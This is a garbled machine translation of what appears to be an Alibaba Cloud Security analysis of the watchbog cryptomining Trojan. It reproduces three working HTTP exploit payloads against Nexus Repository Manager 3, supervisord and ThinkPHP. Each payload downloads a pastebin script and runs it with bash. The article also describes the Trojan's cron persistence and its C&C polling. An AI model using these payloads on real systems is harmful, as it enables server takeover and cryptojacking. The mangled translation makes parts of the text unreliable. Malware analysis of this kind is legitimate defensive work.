Recently, Ali cloud security monitoring to watchbog mining Trojan use the new exposure of the Nexus Repository Manager 3 remote code execution vulnerability(CVE-2019-7238)for attack and mining the events.
It is worth noting that this attack Start Time 2 on 24th and 2 on 5 May above products, the parent company issued a vulnerability announcement separated by only more than half a month, once again confirms thevulnerability from exposure to the Black output is used for mining the time is growing short. In addition, the attacker also utilizes supervisord is restarted, the ThinkPHP products such as vulnerability to attack.
This article analyzed the Trojan’s internal structure and mode of transmission, and on how to clean up, to prevent similar mining Trojan gives security recommendations.
Mining Trojan spread analysis
Attacker major through the direct attack of the host service’s vulnerability to Trojan propagation, which means that it does not currently have the worms contagious, this point is similar to 8220 gang. Even so, attacker still gets a lot of broiler chickens.
In particular, 2 on 24 May, the attack from the original attack only ThinkPHP and supervisord is restarted, to join the Nexus Repository Manager 3 the attack code, you can see the mining pool hash rate on the day that surged about 3-fold, reaching 210KH/s around earnings about $ 25/day, meaning that the highest may have 1 to 2 million hosts controlled mining?
! [](/Article/UploadPic/2019-3/20193122279481.jpg)
The following is Ali Cloud Security to the acquisition of the 3 types of attack payload
?1?for the Nexus Repository Manager 3 remote code execution vulnerability(CVE-2019-7238)the use of
POST /service/extdirect HTTP/1.1 Host: ?victim_ip?:8081X-Requested-With: XMLHttpRequestContent-Type: application/json {“action”: “coreui_Component”, “type”: “rpc”, “tid”: 8, “data”: [{“sort”: [{“direction”: “ASC”, “property”: “name”}], “start”: 0, “filter”: [{“property”: “repositoryName”, “value”: “*”}, {“property”: “expression”, “value”: “233. class. forName(‘java. lang. Runtime’). getRuntime(). exec(‘curl-fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby’)”}, {“property”: “type”, “value”: “jexl”}], “limit”: 50, “page”: 1}], “method”: “previewAssets”}
?2?for supervisord is restarted remote command execution vulnerability(CVE-2017-11610)the use of
POST /RPC2 HTTP/1.1 Host: ?victim_ip?:9001Content-Type: application/x-www-form-urlencoded u0002u0002supervisor. supervisord is restarted. options. warnings. linecache. os. systemu0002
u0002
u0002curl https://pastebin.com/raw/zXcDajSs -o /tmp/babyu0002u0002u0002
?3?for ThinkPHP remote command execution vulnerability exploit
POST /index. php? s=captcha HTTP/1.1
Host: ?victim_host?
Content-Type: application/x-www-form-urlencoded
_method=__construct&filter;[]=system&method;=get&server;[REQUEST_METHOD]=curl-fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby
The above three kinds of payload the purpose is the same, that is, the control of the host by executing the following command
curl-fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby
Trojan functional structure analysis
! [](/Article/UploadPic/2019-3/20193122271532.jpg)
The attacked host controlled access https://pastebin. com/raw/zXcDajSs, after repeated after the jump, you will get the following figure shows the shell script, which contains cronlow(), cronhigh(), flyaway()and other functions.
! [](/Article/UploadPic/2019-3/20193122271895.jpg)
After analyzing the results, the script mainly contains following several modules:
1. Mining module
! [](/Article/UploadPic/2019-3/20193122271914.jpg)
Mining module of the download()function, from https://ptpb. pw/D8r9 that$mi_64 the decoded content downloaded by the xmrig rewrite of the mining program, saved as/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc. service-g1g5qf/cred/fghhhh/data/watchbog, and from https://ptpb. pw/hgZI download the configuration file, and then start mining it.
Another function testa()is also similar, but it download the IS the xmr-stak mining program.
2. Persistence module
Will execute the malicious command is written to the/etc/cron. d/root and other file
! [](/Article/UploadPic/2019-3/20193122271240.jpg)
3. c&c;the module
c&c;the module is mainly in the dragon()and flyaway()function is implemented.
! [](/Article/UploadPic/2019-3/20193122272846.jpg)
The following figure shows the decoding after the dragon function
! [](/Article/UploadPic/2019-3/20193122272974.jpg)
It will be followed by a request to https://pastebin. com/raw/05p0fTYd such as a plurality of addresses, and executes the received Command. Interestingly, these addresses are currently are stored in some common words, may be the Trojan author reserved for future use.
flyaway()function and the dragon()is slightly different, it will start with the https://pixeldra. in/api/download/8iFEEg download/tmp/elavate it.
! [](/Article/UploadPic/2019-3/20193122272758.jpg)
**[1] [[2]]() [next]()**Read More
References
Back to Main